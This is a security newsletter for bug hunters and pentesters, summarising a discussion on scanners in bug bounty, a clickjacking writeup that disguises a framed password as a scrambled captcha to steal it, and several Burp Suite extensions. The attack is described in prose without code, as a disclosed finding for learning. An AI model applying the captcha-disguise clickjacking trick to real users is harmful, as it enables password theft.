The 5 Hacking NewsLetter 86
Posted in Newsletter on December 31, 2019
Posted in Newsletter on July 2, 2019
Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from 21 to 28 of June.
Do you use vulnerability scanner on bug bounty program? How is the result?
This is an interesting discussion for beginner bug hunters on why you shouldn’t use scanners in bug bounty. Vulnerability scanners are of low added value because many other people (including internal pentesters) have probably already run them. So it’s improbable that they’ll allow you to find anything new of real value. This, combined with the risk of causing Denial of Service if many bug hunters use scanners on the same target, is why scanners are generally not allowed.
The following reasons apply to pentesting too: the risk of causing an email flood to a client email address (happened to me once!), and the risk of deleting resources by using spidering on authenticated pages.
These risks are good to know whether you’re a bug hunter or pentester. It helps decide which tools to run or not and avoid causing service disruptions.
Also, I find cym13’s stance on Burp interesting. There really is no ‘one size fits all’!
GOTCHA: Taking phishing to a whole new level ($100 + $1000 bonus for creativity)
This is a writeup of a Clickjacking attack found during a live hacking event.
What tipped off @securinti was a button that triggered an AJAX request to display the user’s password. The requests didn’t use X-FRAME-OPTIONS headers so he was able to display the user’s password within an iframe. Classic clickjacking, but the problem is that he couldn’t read the password because of CORS.
His genious idea to bypass CORS and get the user’s password was to create an iframe that looked like a captcha form. He also scrambled the password’s letters to make it look like a captcha (so the user wouldn’t recognize that it was their own password). When they would enter the captcha, he would get it, re-order the letter and get their password.
If you want to know more about this kind of attacks, I recommend the paper Tell Me About Yourself: The Malicious CAPTCHA Attack.
Burp Suite tutorial: IDOR vulnerability automation using Autorize and AutoRepeater (bug bounty)
This video tutorial is a must if you’re serious about Web app security and don’t already use Autorize and Autorepeater. These are two Burp Suite extensions that can, among other things, be used to automatically detect IDOR.
This kind of advanced Burp usage can seem overwhelming or confusing if you’re starting out. So it’s nice to be walked through the whole process. Thank you @Regala_ and @stokfredrik!
Hands on Hacking with zseano & Bugbountynotes session carrying on
I lo-o-ove this live mentoring concept by @zseano. It is a great opportunity to spend a few hours hacking on a fake website created for the occasion, while being live with an online mentor, and also practice writing bug bounty reports. It’s fun whether you’re a beginner or a seasoned bug hunter.
I had network connection issues right when the live started. That was so annoying! But the next session is on July 21st.
Taborator is a Burp extension that shows the Collaborator client in a tab (instead of a new Burp window by default).
So it’s more practical if you play with Collaborator often. It’s worthing checking out and is easy to install (via the BApp Store) and use.
See more writeups on The list of bug bounty writeups.
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 06/21/2019 to 06/28/2019.
Have a nice week folks!
If you enjoyed reading this, please consider sharing it, leaving a comment, suggestions, questions…